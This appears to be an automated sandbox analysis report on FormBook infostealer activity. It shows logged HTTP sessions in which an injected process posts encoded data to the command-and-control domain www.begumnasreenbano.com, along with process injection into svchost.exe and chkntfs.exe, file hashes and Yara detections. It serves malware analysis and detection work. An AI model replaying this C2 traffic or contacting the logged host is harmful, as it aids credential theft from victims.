                        Date: Tue, 03 Sep 2024 08:46:45 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:50.4771474Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.465019188.114.97.3804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:50.765615940 CEST736OUTPOST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 45 71 79 36 45 72 64 31 69 79 69 6f 45 57 4c 58 61 76 7a 51 67 6e 6c 79 31 36 6e 2f 75 54 59 52 6b 71 4e 42 31 6a 4c 62 6b 7a 62 45 38 4d 67 6c 47 48 52 73 76 2b 41 77 58 70 61 2b 65 2f 6b 56 67 4a 2f 42 73 4b 64 6e 47 46 37 55 76 39 41 47 66 6e 56 4b 32 7a 6b 70 53 4b 45 78 35 56 44 41 5a 49 4d 42 67 46 6e 4f 42 75 71 6c 4b 33 6d 52 59 39 78 4e 66 4b 56 55 47 71 56 56 7a 6d 44 48 63 50 4b 73 33 6a 4e 4e 2b 62 48 69 72 50 53 74 71 53 64 30 78 39 67 48 6d 4d 35 57 54 77 4d 4b 49 4a 42 7a 7a 77 49 31 39 54 31 73 78 7a 6e 4c 48 54 55 4c 51 38 48 6b 50 78 6a 48 39 63 35 5a 48 51 3d 3d
                        Data Ascii: Qd=Eqy6Erd1iyioEWLXavzQgnly16n/uTYRkqNB1jLbkzbE8MglGHRsv+AwXpa+e/kVgJ/BsKdnGF7Uv9AGfnVK2zkpSKEx5VDAZIMBgFnOBuqlK3mRY9xNfKVUGqVVzmDHcPKs3jNN+bHirPStqSd0x9gHmM5WTwMKIJBzzwI19T1sxznLHTULQ8HkPxjH9c5ZHQ==
                        Sep 3, 2024 10:46:51.843858957 CEST876INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:51 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478c1da5b42b7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                        Sep 3, 2024 10:46:52.082355022 CEST876INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:51 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478c1da5b42b7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.2.465020188.114.97.3804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:53.322487116 CEST756OUTPOST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 45 71 79 36 45 72 64 31 69 79 69 6f 65 32 37 58 4a 49 6e 51 6d 48 6c 78 77 36 6e 2f 37 44 59 4e 6b 71 42 42 31 69 2f 79 6a 42 50 45 38 74 51 6c 55 56 31 73 75 2b 41 77 44 5a 61 37 51 66 6b 61 67 49 44 7a 73 49 4a 6e 47 46 48 55 76 34 45 47 66 57 56 56 33 6a 6b 76 4c 36 45 7a 39 56 44 41 5a 49 4d 42 67 45 44 6b 42 75 79 6c 4b 44 69 52 61 63 78 4f 44 61 56 54 57 36 56 56 2b 47 44 63 63 50 4c 37 33 68 35 33 2b 65 62 69 72 50 69 74 70 41 6b 69 37 39 67 42 69 4d 34 6c 56 56 78 63 49 49 6f 70 79 42 6f 51 34 52 42 58 35 56 32 52 57 69 31 63 43 38 6a 58 53 32 71 7a 77 66 45 51 63 52 53 30 74 66 76 6e 76 59 33 37 5a 74 41 66 2b 75 63 6b 67 68 30 3d
                        Data Ascii: Qd=Eqy6Erd1iyioe27XJInQmHlxw6n/7DYNkqBB1i/yjBPE8tQlUV1su+AwDZa7QfkagIDzsIJnGFHUv4EGfWVV3jkvL6Ez9VDAZIMBgEDkBuylKDiRacxODaVTW6VV+GDccPL73h53+ebirPitpAki79gBiM4lVVxcIIopyBoQ4RBX5V2RWi1cC8jXS2qzwfEQcRS0tfvnvY37ZtAf+uckgh0=
                        Sep 3, 2024 10:46:54.222376108 CEST880INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:54 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c91hzZfyLQVvalF5d%2FNsVYmFDqNSsdwOqAxeUECQc5IbUfhh%2Bhmw9whbhXxgLvHTd9Ry4j0B0UoDC%2F7njtMFfosqovQuJ4UTf9dDeuNTdMt2yqx0B9%2F7t1d3DE1gLxKOCVQ8X0Q4FfS9Cl0%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478d18c634211-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.2.465021188.114.97.3804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:55.862021923 CEST10838OUTPOST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 45 71 79 36 45 72 64 31 69 79 69 6f 65 32 37 58 4a 49 6e 51 6d 48 6c 78 77 36 6e 2f 37 44 59 4e 6b 71 42 42 31 69 2f 79 6a 42 33 45 38 66 59 6c 47 6c 4a 73 38 75 41 77 66 4a 61 36 51 66 6b 39 67 49 62 33 73 49 46 52 47 44 44 55 76 61 4d 47 5a 6b 39 56 2b 6a 6b 76 44 61 45 2b 35 56 44 76 5a 4a 38 4e 67 45 54 6b 42 75 79 6c 4b 46 4f 52 64 4e 78 4f 42 61 56 55 47 71 56 5a 7a 6d 43 53 63 50 53 4f 33 68 73 56 39 71 58 69 72 72 4f 74 6f 7a 63 69 33 39 67 44 75 73 34 39 56 56 30 43 49 49 30 74 79 42 63 75 34 53 64 58 36 79 7a 48 4d 43 68 41 41 76 43 4d 4d 78 47 56 72 76 63 4d 55 79 4f 31 72 36 6a 68 30 59 48 4e 55 61 78 31 37 37 4d 79 39 57 74 67 55 72 55 63 77 59 6e 4e 4b 6b 4d 4d 46 37 51 43 34 62 68 33 56 65 45 4a 46 45 6e 53 50 48 54 4c 6b 65 67 73 69 65 57 68 63 68 31 39 6b 67 71 43 6b 58 4e 39 65 32 65 70 47 45 37 72 63 55 48 69 76 76 73 6c 64 6e 2f 6d 74 52 45 78 75 31 36 72 70 6b 53 37 2b 4a 70 71 74 65 4b 7a 50 57 57 41 75 58 62 48 68 66 31 59 4d 73 4f 42 2f 67 59 63 69 46 6d 36 39 74 6a [TRUNCATED]
                        Data Ascii: Qd=Eqy6Erd1iyioe27XJInQmHlxw6n/7DYNkqBB1i/yjB3E8fYlGlJs8uAwfJa6Qfk9gIb3sIFRGDDUvaMGZk9V+jkvDaE+5VDvZJ8NgETkBuylKFORdNxOBaVUGqVZzmCScPSO3hsV9qXirrOtozci39gDus49VV0CII0tyBcu4SdX6yzHMChAAvCMMxGVrvcMUyO1r6jh0YHNUax177My9WtgUrUcwYnNKkMMF7QC4bh3VeEJFEnSPHTLkegsieWhch19kgqCkXN9e2epGE7rcUHivvsldn/mtRExu16rpkS7+JpqteKzPWWAuXbHhf1YMsOB/gYciFm69tjE5ELipLQHWnbGMjdG/pDSTut2xGW26E9Tcv2vc1DFeyHIXoOKiM5fQ56rZ6YNmxA8Jpsv6Jr5GtzMjIxFJXHncjwNCUBKRtM4HRKUuEKmMniVXc3oGVLhhYbkCKVsT/zVyIQQfHqMrNi5N6bg1Vj9VFVisv3JE5VrahbiqaM+vvJzshIJeHqsqTpgw95QEDUB/X5fe4z5ya+0Psa1vfQs6kpE/p+NheeUs36aT2xfhzDHuM0dB4OtkEmPzJ1YMRn00QFJ4LYEEzU/pPaFMCvn3TUjEsY5webZBrJHug6Qu0iqn7sEyqk//5ZEhHC+54R34ct9oKKSwp8Dxpd50hq+RX2ytGhvB3sObHAWCi7N08anV9Cpg62brk9IF+GiSUzTkJRiNF+dZ7IE8WudZZmBsVNHT/R1ward09Q8klAmKBM1V+AV39sOuuLAOlTaP7xTLBGrDA+3Dwq8kRxpcwtPHXh6oyzf5qtLjC5oIVb5s/ZObQcSO+isyhOReU5UJZytONLDK9GRzFfF/XB7Oiuc0Drk9DCwmKgd5r4ZvmnKWMmszKDyAGp9FsDgNQ3wynQbWuPCpcuyX5xL+sWJar7vJ3toDcmk4i1InJAkZ3Fh0tyBSCjTcG6qlqz/khUMO1ce0QcNBVLDBYHwW9GPXXeHeZng/9G1dTqz4 [TRUNCATED]
                        Sep 3, 2024 10:46:56.812345982 CEST877INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:56 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTiToVapIr%2F1t2X2ecpH9c0h6KT95l0sLClWclHzwrcnWokq1JZh6aC%2F7hKTuuemiedquf1To6FfaDYQceFI5ENNFqAGy%2F2YUkjOBHdE8DT2E%2BK3QqVBHeL1HTSlghDhRFZ7Eovwwc78ZG4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478e1a9634299-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
                        Sep 3, 2024 10:46:56.812608004 CEST5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.2.465022188.114.97.3804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:58.401916027 CEST450OUTGET /ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.begumnasreenbano.com
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:59.348114014 CEST933INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:59 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhdR9PY6ImYDVp3yxFsS%2F9eD96c5kcCAyZC71xPogWeCoVVIyRSEvZg1JKUmVNBIxfua7m6dR50d%2BFPvxP8cJNAJ49Rs%2FTzm4Lww6vNZp7%2FmyyBY62QhS8fQUkIndC%2BwV5vqId74oUY%2Bj%2B4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478f178e3c3eb-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:04:42:57
                        Start date:03/09/2024
                        Path:C:\Users\user\Desktop\PO_987654345678.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO_987654345678.exe"
                        Imagebase:0xf00000
                        File size:1'250'816 bytes
                        MD5 hash:4214BE98801C44F69B60490A3321E940
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:04:42:57
                        Start date:03/09/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO_987654345678.exe"
                        Imagebase:0xcc0000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:04:43:09
                        Start date:03/09/2024
                        Path:C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe"
                        Imagebase:0xfc0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:3
                        Start time:04:43:11
                        Start date:03/09/2024
                        Path:C:\Windows\SysWOW64\chkntfs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                        Imagebase:0xae0000
                        File size:19'968 bytes
                        MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:7
                        Start time:04:43:24
                        Start date:03/09/2024
                        Path:C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe"
                        Imagebase:0xfc0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:8
                        Start time:04:43:36
                        Start date:03/09/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff6bf500000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.2%
                          Dynamic/Decrypted Code Coverage:1.5%
                          Signature Coverage:3.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:50
